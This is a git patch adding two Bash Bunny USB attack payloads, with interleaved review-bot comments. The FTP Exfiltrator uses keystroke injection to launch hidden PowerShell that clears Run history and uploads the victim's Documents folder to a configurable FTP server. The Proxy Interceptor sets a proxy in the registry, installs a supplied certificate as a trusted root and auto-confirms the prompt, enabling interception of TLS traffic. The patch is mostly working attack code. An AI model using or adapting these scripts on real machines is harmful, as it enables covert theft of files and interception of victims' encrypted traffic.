From 385a54656c4a6cad5ff8feec1f1bcbe101528f72 Mon Sep 17 00:00:00 2001
From: nutt318
Date: Fri, 7 Apr 2017 01:51:38 -0500
Subject: [PATCH 1/2] Added FTPExfiltration payload (#90)

* First commit of all documents First commit
* Fixed user document folder
* Removed unneeded line
* Edited URL to forum
---
 payloads/library/ftp_exfiltrator/1.ps1 | 78 ++++++++++++++++++++
 payloads/library/ftp_exfiltrator/payload.txt | 27 +++++++
 payloads/library/ftp_exfiltrator/readme.md | 26 +++++++
 3 files changed, 131 insertions(+)
 create mode 100644 payloads/library/ftp_exfiltrator/1.ps1
 create mode 100644 payloads/library/ftp_exfiltrator/payload.txt
 create mode 100644 payloads/library/ftp_exfiltrator/readme.md
diff --git a/payloads/library/ftp_exfiltrator/1.ps1 b/payloads/library/ftp_exfiltrator/1.ps1
new file mode 100644
index 00000000..1c0fec26
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/1.ps1
@@ -0,0 +1,78 @@
+clear
+#Clear Run History
+remove-item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
+
+# Credit to dkittell - https://gist.github.com/dkittell/f029b6c7d1c46ebcffcb
+# I've modified a bit of his code to create a directory with the username, I'm sure there is a better way to do this but not sure how
+
+# FTP Server Variables - edit the xxxxx
+$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'
+$FTPUser = 'xxxxx'
+$FTPPass = 'xxxxx'
+
+#Directory where to find files to upload
+$UploadFolder = "$env:userprofile\Documents\"
+
+$webclient = New-Object System.Net.WebClient
+$webclient.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass)
+
+$SrcEntries = Get-ChildItem $UploadFolder -Recurse
+$Srcfolders = $SrcEntries | Where-Object{$_.PSIsContainer}
+$SrcFiles = $SrcEntries | Where-Object{!$_.PSIsContainer}
+
+#Creates Folder with victims Username
+try {
+$makeDirectory = [System.Net.WebRequest]::Create($FTPHost);
+$makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+$makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+$makeDirectory.GetResponse();
+}
+catch [Net.WebException] {}
+
+# Create FTP Directory/SubDirectory If Needed - Start
+foreach($folder in $Srcfolders)
+{
+    $SrcFolderPath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+    $DesFolder = $folder.Fullname -replace $SrcFolderPath,$FTPHost
+    $DesFolder = $DesFolder -replace "\\", "/"
+    # Write-Output $DesFolder
+
+    try
+    {
+        $makeDirectory = [System.Net.WebRequest]::Create($DesFolder);
+        $makeDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+        $makeDirectory.Method = [System.Net.WebRequestMethods+FTP]::MakeDirectory;
+        $makeDirectory.GetResponse();
+        #folder created successfully
+    }
+    catch [Net.WebException]
+    {
+        try {
+            #if there was an error returned, check if folder already existed on server
+            $checkDirectory = [System.Net.WebRequest]::Create($DesFolder);
+            $checkDirectory.Credentials = New-Object System.Net.NetworkCredential($FTPUser,$FTPPass);
+            $checkDirectory.Method = [System.Net.WebRequestMethods+FTP]::PrintWorkingDirectory;
+            $response = $checkDirectory.GetResponse();
+            #folder already exists!
+        }
+        catch [Net.WebException] {
+            #if the folder didn't exist
+        }
+    }
+}
+# Create FTP Directory/SubDirectory If Needed - Stop
+
+# Upload Files - Start
+foreach($entry in $SrcFiles)
+{
+    $SrcFullname = $entry.fullname
+    $SrcName = $entry.Name
+    $SrcFilePath = $UploadFolder -replace "\\","\\" -replace "\:","\:"
+    $DesFile = $SrcFullname -replace $SrcFilePath,$FTPHost
+    $DesFile = $DesFile -replace "\\", "/"
+    # Write-Output $DesFile
+
+    $uri = New-Object System.Uri($DesFile)
+    $webclient.UploadFile($uri, $SrcFullname)
+}
+# Upload Files - Stop
\ No newline at end of file
diff --git a/payloads/library/ftp_exfiltrator/payload.txt b/payloads/library/ftp_exfiltrator/payload.txt
new file mode 100644
index 00000000..eff48232
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/payload.txt
@@ -0,0 +1,27 @@
+#!/bin/bash
+#
+# Title: FTP Exfiltrator
+# Author: Nutt
+# Version: 1.0
+# Target: Windows
+#
+#Exfiltrates files from the users Documents folder
+#FTP's all files/folders to a specified FTP site named by the victim hostname.
+#Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+#Executes 1.ps1
+
+#Purple.........Setup
+#Red............Failed - Need to work on
+#Green..........Finished
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R B
+ATTACKMODE HID STORAGE
+QUACK GUI r
+QUACK DELAY 1000
+QUACK STRING powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.ps1')"
+QUACK ENTER
+LED G
\ No newline at end of file
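Review bot: The remote directory is built from the username, not the hostname: `$FTPHost = 'ftp://ftp.xxxxx.com/' + $env:username + '/'` together with the comment `#Creates Folder with victims Username`, whereas payload.txt and readme.md in this same commit both describe the FTP site as "named by the victim hostname"; one of the two should be corrected. The readme's Configuration section is also silent about two things a reader of the script sees at once: the `remove-item "HKCU:\...\Explorer\RunMRU"` step at the top, and the fact that plain FTP carries the credentials from the script and the uploaded files over the network unencrypted. None of the `catch [Net.WebException]` blocks produce any output, so the "Red / Failed" LED state listed in the readme is never reached; the readme already marks it "Not working yet", and a comment at the catch sites saying the same would keep the two in step.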
diff --git a/payloads/library/ftp_exfiltrator/readme.md b/payloads/library/ftp_exfiltrator/readme.md
new file mode 100644
index 00000000..6b2416ed
--- /dev/null
+++ b/payloads/library/ftp_exfiltrator/readme.md
@@ -0,0 +1,26 @@
+# FTP Exfiltrator for Bash Bunny
+
+* Author: Nutt
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Exfiltrates files from the users Documents folder
+FTP's all files/folders to a specified FTP site named by the victim hostname.
+Powershell FTP script will stay running after BashBunny is unplugged, once light turns green unplug and check FTP site.
+
+## Configuration
+
+Edit 1.ps1 to specify FTP site, username and password
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Purple | Setup |
+| Red | Failed - Not working yet |
+| Green | Attack Complete |
+
+## Discussion
+[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40492-payload-ftp-exfiltrator/ "Hak5 Forum Thread")

From c14732e57aaa915a5115c86b5bcc4448ea1a19d5 Mon Sep 17 00:00:00 2001
From: NightStalker
Date: Fri, 7 Apr 2017 01:56:28 -0500
Subject: [PATCH 2/2] Added ProxyInterceptor payload (#82)

* Sets specified proxy and imports certificate for MITM
* Update cert.pem
* Update README.md
* Update README.md
* Update README.md
* Update README.md
* Update README.md
* Update vars.ps1
* Update payload.txt
* Update README.md
* Update README.md
---
 .../library/Proxy_Interceptor/ImportCert.ps1 | 6 ++
 payloads/library/Proxy_Interceptor/README.md | 30 +++++++++
 .../library/Proxy_Interceptor/SetProxy.ps1 | 19 ++++++
 payloads/library/Proxy_Interceptor/cert.pem | 4 ++
 .../library/Proxy_Interceptor/payload.txt | 65 +++++++++++++++++++
 payloads/library/Proxy_Interceptor/vars.ps1 | 3 +
 6 files changed, 127 insertions(+)
 create mode 100644 payloads/library/Proxy_Interceptor/ImportCert.ps1
 create mode 100644 payloads/library/Proxy_Interceptor/README.md
 create mode 100644 payloads/library/Proxy_Interceptor/SetProxy.ps1
 create mode 100644 payloads/library/Proxy_Interceptor/cert.pem
 create mode 100644 payloads/library/Proxy_Interceptor/payload.txt
 create mode 100644 payloads/library/Proxy_Interceptor/vars.ps1
diff --git a/payloads/library/Proxy_Interceptor/ImportCert.ps1 b/payloads/library/Proxy_Interceptor/ImportCert.ps1
new file mode 100644
index 00000000..d4612cb0
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/ImportCert.ps1
@@ -0,0 +1,6 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Add certificate to certificate store
+$certFile = ( Get-ChildItem -Path $certName )
+$certFile | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
\ No newline at end of file
diff --git a/payloads/library/Proxy_Interceptor/README.md b/payloads/library/Proxy_Interceptor/README.md
new file mode 100644
index 00000000..e8976216
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/README.md
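Review bot: `Import-Certificate -CertStoreLocation cert:\CurrentUser\Root` places the certificate in the current user's Trusted Root Certification Authorities store, but the comment `#Add certificate to certificate store` and the README.md in this commit say neither which store is used nor that the trust persists after the payload finishes and is not removed by anything in this commit. The comment should name the store, e.g. `#Add certificate to the current user's Trusted Root store (cert:\CurrentUser\Root); the entry persists until removed`, and the README's Description should state the same so the change can be located and reverted. `. .\vars.ps1` and `Get-ChildItem -Path $certName` resolve against the working directory that payload.txt sets before invoking the script, which is worth a one-line comment here since the script cannot be run from elsewhere as written.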
@@ -0,0 +1,30 @@
+# Proxy Interceptor for Bash Bunny
+
+Author: NightStalker
+
+Version: 1.0
+
+## Description
+
+This payload will enable a proxy and import an SSL certificate to a Windows
+computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+The script uses a combination of Ducky Code and PowerShell.
+
+*Note: Currently no falure LED, if remains red for more than 60 seconds
+script failed. Will build checks in later version.
+
+## Requirements
+
+Certificate needs to be in .pem format and in the root switch directory with
+payload.txt, set the certificate and proxy information in the vars.ps1 file.
+
+## STATUS
+
+| LED | Status |
+| ---------------- | ------------------------------------- |
+| White (blinking) | Script Running. |
+| Purple (blinging)| Script Complete. |
+
+## Discussion
+
+https://forums.hak5.org/index.php?/topic/40476-payload-proxy-interceptor/
diff --git a/payloads/library/Proxy_Interceptor/SetProxy.ps1 b/payloads/library/Proxy_Interceptor/SetProxy.ps1
new file mode 100644
index 00000000..74458979
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/SetProxy.ps1
@@ -0,0 +1,19 @@
+#Import variables from vars.ps1 for use.
+. .\vars.ps1
+
+#Change the Execution Policy to RemoteSigned and see if Internet Explorere is running and if so close it.
+Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
+$ieProcess = Get-Process iexplore -ErrorAction SilentlyContinue
+if ($ieProcess) {
+    $ieProcess.CloseMainWindow()
+Sleep 5
+if (!$ieProcess.HasExited) {
+    $ieProcess | Stop-Process -Force
+    }
+}
+Remove-Variable ieProcess
+
+#Change the proxy settings in the registry
+$regKey="HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
+Set-ItemProperty -path $regKey ProxyEnable -value 1
+Set-ItemProperty -path $regKey ProxyServer -value $proxyVal
\ No newline at end of file
diff --git a/payloads/library/Proxy_Interceptor/cert.pem b/payloads/library/Proxy_Interceptor/cert.pem
new file mode 100644
index 00000000..c0bfbec0
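Review bot: The body of `if ($ieProcess) {` in SetProxy.ps1 is inconsistently indented: `Sleep 5` and the inner `if (!$ieProcess.HasExited) {` sit at column 0 while `$ieProcess | Stop-Process -Force` and its closing brace are indented, so the nesting reads wrong at a glance; indent the inner statements one level and prefer the full `Start-Sleep -Seconds 5` over the `Sleep` alias. The comment above `Set-ExecutionPolicy RemoteSigned -Scope CurrentUser` (which also misspells "Explorer") does not say that this policy change and the `ProxyEnable`/`ProxyServer` values written at the bottom persist after the script exits and are restored nowhere in this commit; README.md in this commit should list those persistent changes so they can be reverted. The README's "falure" and "blinging" typos could be fixed in the same pass.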
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/cert.pem
@@ -0,0 +1,4 @@
+-----BEGIN CERTIFICATE-----
+REPLACE WITH CORRECT VALID PEM FORMAT CERTIFICATE
+FROM PROXY FOR SSL INTERCEPTION.
+-----END CERTIFICATE-----
diff --git a/payloads/library/Proxy_Interceptor/payload.txt b/payloads/library/Proxy_Interceptor/payload.txt
new file mode 100644
index 00000000..b5e180f9
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/payload.txt
@@ -0,0 +1,65 @@
+#!/bin/bash
+#
+# Title: Proxy Interceptor
+# Author: NightStalker
+# Version: 1.0
+#
+#This payload will enable a proxy and import an SSL certificate to a Windows
+#computer for Internet Explorer and Chrome (FireFox is in progress for 2.0)
+#The script uses a combination of Ducky Code and PowerShell.
+#
+# Set proxy and certificate varaibles in vars.ps1, certificate must be in same folder as payload.txt
+#
+# Red Blinking.............Running Payload
+# Purple Blinking .........Payload Completed
+
+#Set Red LED to indicate Starting of Script
+LED R 50
+
+#Set ATTACKMODE to HID and Storage to be able to transfer the certificate
+ATTACKMODE HID STORAGE
+
+#Import Bunny Helpers
+source bunny_helpers.sh
+
+#Start of Script
+Q DELAY 6000
+Q GUI r
+Q DELAY 100
+Q STRING POWERSHELL
+Q ENTER
+Q DELAY 100
+
+#Change to the directory of the Bunny with the proper switch location
+Q STRING \$driveLetter = \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\'\).Name
+Q ENTER
+Q STRING \$absPath = \$driveLetter\+\'payloads\\\'\+\'$SWITCH_POSITION\'\+\'\\\'
+Q ENTER
+Q STRING cd \$absPath
+Q ENTER
+Q DELAY 500
+
+#Set the proxy in the internet settings in the registry (For IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\SetProxy.ps1')"
+Q ENTER
+Q DELAY 500
+
+#Import the certificate to the computer (for IE and Chrome).
+Q STRING powershell -ExecutionPolicy RemoteSigned ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ImportCert.ps1')"
+Q ENTER
+Q DELAY 1000
+Q ALT y
+Q DELAY 500
+
+#Unmount the USB Drive.
+Q STRING \$driveEject = New-Object -comObject Shell.Application
+Q ENTER
+Q STRING \$driveEject.Namespace\(17\).ParseName\(\"\$driveLetter\"\).InvokeVerb\(\"Eject\"\)
+Q ENTER
+Q DELAY 500
+Q ALT t
+Q DELAY 500
+Q STRING EXIT
+Q ENTER
+sync
+LED R B 100
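Review bot: The LED states documented in this header (`# Red Blinking.............Running Payload`, `# Purple Blinking .........Payload Completed`) match the code (`LED R 50`, `LED R B 100`) but not the README.md in this commit, whose STATUS table lists "White (blinking)" for the running state; the README row should read Red so the two documents agree. The header comment also misspells "variables" as `varaibles`. `Q ALT y` after the ImportCert.ps1 launch has no comment saying which prompt it answers, and since it accepts the certificate-store change on the user's behalf that deserves to be stated in the README's Description rather than left implicit.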
diff --git a/payloads/library/Proxy_Interceptor/vars.ps1 b/payloads/library/Proxy_Interceptor/vars.ps1
new file mode 100644
index 00000000..9f2ffa59
--- /dev/null
+++ b/payloads/library/Proxy_Interceptor/vars.ps1
@@ -0,0 +1,3 @@
+#Set variables for use in payload.
+$proxyVal = "proxyip:port"
+$certName = "cert.pem"